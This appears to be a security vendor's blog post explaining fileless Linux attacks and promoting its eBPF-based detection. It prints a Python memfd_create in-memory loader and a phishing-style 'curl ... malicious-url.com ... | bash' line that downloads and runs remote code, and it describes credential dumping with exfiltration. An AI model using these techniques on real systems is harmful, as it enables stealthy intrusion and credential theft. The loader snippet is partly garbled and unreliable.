Maor Idan
May 13, 2025
3
min
Welcome to Stream’s Engineering Desk. This is where we explore real-world attack techniques, how they work in cloud environments, and how Stream detects and responds to them in real time. If you’re into system internals, threat detection, and cloud security, you’re in the right place.
Welcome to Stream’s Engineering Desk. This is where we explore real-world attack techniques, how they work in cloud environments, and how Stream detects and responds to them in real time. If you’re into system internals, threat detection, and cloud security, you’re in the right place.
Traditional security tools focus on scanning files written to disks, but what happens when no file ever lands there? Fileless execution attacks bypass static analysis and disk-based detection by executing directly in memory, often through existing tools like Bash,Python, or PowerShell. Although the Linux system call has benefits for software development, especially in the cloud, including use in sandbox frameworks, containerized applications, and temporary computations, those benefits are manipulated by threat actors to carry out attacks.
In this blog, we’ll walk through areal-world example of the use of fileless execution attacks, how threat actors use them, and how Stream.Security’s detection engine catches fileless execution attacks in real time using process telemetry and runtime tracing.
Unlike a cyberattack that utilizes traditional malware files to compromise a system, fileless cyberattacks exploit legitimate tools that already exist in the OS without adding files that can potentially be detected and monitored. This allows breaches to remain undetected by endpoint-based security tools for longer periods of time. For threat actors utilizing advanced persistent threat (APT) mechanisms that depend on remaining undetected for long periods of time, fileless execution attacks are the perfect tool to extend dwell time.
Start by writing a C program and compile it using gcc. This binary can contain anything, from a harmless “Hello world!” to a complex backdoor. For example:
C code: “
#include <stdio.h>
int main() {
printf("Helloworld!\n");
return 0;
}
“
Run a Base64 to encode the binary. This allows easy embedding into scripts without needing to use the raw binary. Save the encoded payload.
Create a new Python script that decodes the payload, loads it into the memory using “memfd_create," and executes the script directly from memory without ever writing to the disk.
payload_b64 = """<YOUR_BASE64_ENCODED_PAYLOAD>"""
# Decode the Base64 string
payload = base64.b64decode(payload_b64) #decode the base64 string
l = ctypes.CDLL(None) #load the dynamic library
s = l.syscall #get the syscall function
MEMFD_CREATE = 319f = s(MEMFD_CREATE, '', 1) #create a new file descriptor
os.write(f, payload) #writethe payload to the file descriptor
p = '/proc/self/fd/%d' % f #getthe path to the file descriptor
os.execle(p, 'dummy', {}) #execute the payload
A threat actor sends a phishing email to a DevOps engineer, urging them to run a fake SSL certificate renewal script. This gives the threat actor initial access to the environment: shell code: curl -s http://malicious-url.com/CloudCertCheck.run| bash
The script downloads and runs a base64-encoded credential dumper entirely in memory using memfd_create. It then scans the memory of processes like sshd or sudo to extract credentials, then exfiltrates the data to a remote server - all without writing anything to the disk. The sshd and sudo commands allow the threat actor to manage remote servers and containers over secure channels with elevated privileges (root/admin) that access restricted files or modify system settings. This fileless technique leaves minimal forensic evidence and relies on abusing Linux features like/proc/self/fd, making it stealthy and hard to detect.
Traditional detection tools typically operate using rule-based monitoring for threats that receive data from statics cans. But detection based on rules and scans cannot catch fileless execution attacks, as they rely on scanning files for known malware signatures, indicators of compromise (IOCs), and assumed static assets in the infrastructure. That means that tools like next-gen anti-virus (NGAV), endpoint protection platforms (EPP), and endpoint detection and response (EDR and XDR)will miss fileless execution attacks. Without a footprint for scanners to inspect or predefined patterns to meet rigid rule-based systems, fileless execution attacks by nature bypass traditional detection tools.
Stream’s platform uses eBPF (extended Berkeley PacketFilter) technology to monitor system activity at the kernel level with minimal overhead. Specifically, Stream's runtime agent hooks into relevant syscalls, like memfd_create and execution via /proc/self/fd/*, that are commonly used in fileless execution attacks.
Whenever fileless execution occurs, Stream’s eBPF program captures and emits a detailed event summary that includes:
These insights are streamed in real-time to our detection engine, allowing Stream to instantly flag and correlate fileless execution with potential malicious behavior, even if nothing ever touches the disk.
Stream’s CloudTwin™ continuously monitors cloud activities and configurations in real-time across cloud layers, including behavior patterns and identity correlations that are foundational components of fileless execution. This difference means that security teams no longer need to rely on point-in-time scans to detect changes made in their environment.
With Stream’s behavioral analysis engine, threats are analyzed in context using baselines and anomaly detection models that surface rare or out-of-pattern activity. Instead of depending on malware signatures or file presence, the CloudTwin™ focuses on how processes behave to detect malicious intent. Even if no file is ever dropped and the process self-deletes, Stream detects and flags the activity immediately, offering security teams rich forensic detail, clear prioritization, and contextual enrichment for fast triage and response.
Fileless execution attacks exploit gaps in traditional detection, but Stream.Security was built to close them. With real-time visibility, kernel-level telemetry, and our CloudTwin™ technology, Stream detects stealthy cloud threats others miss.
By modeling behavior across cloud layers and responding with precision, Stream helps SecOps teams cut through noise and stop attacks before damage occurs.
Stay tuned for the next blog in the series from the Stream Engineering Desk.
Stream.Security delivers the only cloud detection and response solution that SecOps teams can trust. Born in the cloud, Stream’s Cloud Twin solution enables real-time cloud threat and exposure modeling to accelerate response in today’s highly dynamic cloud enterprise environments. By using the Stream Security platform, SecOps teams gain unparalleled visibility and can pinpoint exposures and threats by understanding the past, present, and future of their cloud infrastructure. The AI-assisted platform helps to determine attack paths and blast radius across all elements of the cloud infrastructure to eliminate gaps accelerate MTTR by streamlining investigations, reducing knowledge gaps while maximizing team productivity and limiting burnout.
